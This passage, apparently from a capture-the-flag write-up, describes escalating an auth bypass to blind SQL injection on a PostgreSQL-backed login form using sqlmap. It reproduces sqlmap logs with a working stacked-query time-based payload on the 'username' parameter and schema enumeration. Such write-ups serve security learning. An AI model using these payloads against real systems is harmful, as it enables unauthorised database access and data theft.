But that did not earn anything interesting as opposed to my expectations. I looked around the source for any hints and but didnt find anything. Not even a single JS file. Rest of the code and css files had nothing of value. So after a hint from the discord channel it was time to expand on the same issue that got me the admin in the first place. Extending auth bypass to SQLi. So I let loose sqlmap to see it if works and it did. Passing the login request to sqlmap using text file did the work.
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:30:22 /2020-03-07/
[11:30:22] [INFO] parsing HTTP request from 'req1.txt' [11:30:22] [DEBUG] not a valid WebScarab log data [11:30:22] [DEBUG] cleaning up configuration parameters [11:30:22] [DEBUG] setting the HTTP timeout [11:30:22] [DEBUG] setting the HTTP User-Agent header [11:30:22] [DEBUG] creating HTTP requests opener object [11:30:22] [DEBUG] resolving hostname 'web2.utctf.live' [11:30:22] [INFO] testing connection to the target URL [11:30:22] [DEBUG] declared web page charset 'utf-8' [11:30:22] [INFO] checking if the target is protected by some kind of WAF/IPS [11:30:22] [INFO] testing if the target URL content is stable [11:30:23] [INFO] target URL content is stable [11:30:23] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable [11:30:23] [INFO] testing for SQL injection on POST parameter 'username' [11:30:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:31:20] [INFO] checking if the injection point on POST parameter 'username' is a false positive [11:31:31] [DEBUG] checking for filtered characters POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 92 HTTP(s) requests: --- Parameter: username (POST) Type: stacked queries Title: PostgreSQL > 8.1 stacked queries (comment) Payload: username=admin';SELECT PG_SLEEP(5)--&pass=asd Vector: ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)-- --- [11:33:18] [INFO] the back-end DBMS is PostgreSQL back-end DBMS: PostgreSQL [11:33:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/web2.utctf.live'
As we can see the sqlmap returned the injected query and it shows PostgreSQL as the backend database. A blind sqli with stacked queries. So I continued with sqlmap to retrive current DB name with below command.
[11:34:24] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [11:34:35] [INFO] adjusting time delay to 1 second due to good response times public [11:34:59] [DEBUG] performed 46 queries in 53.31 seconds [11:34:59] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes current schema (equivalent to database on PostgreSQL): 'public'
And retrieved the entire public DB as follows that gave us the flag
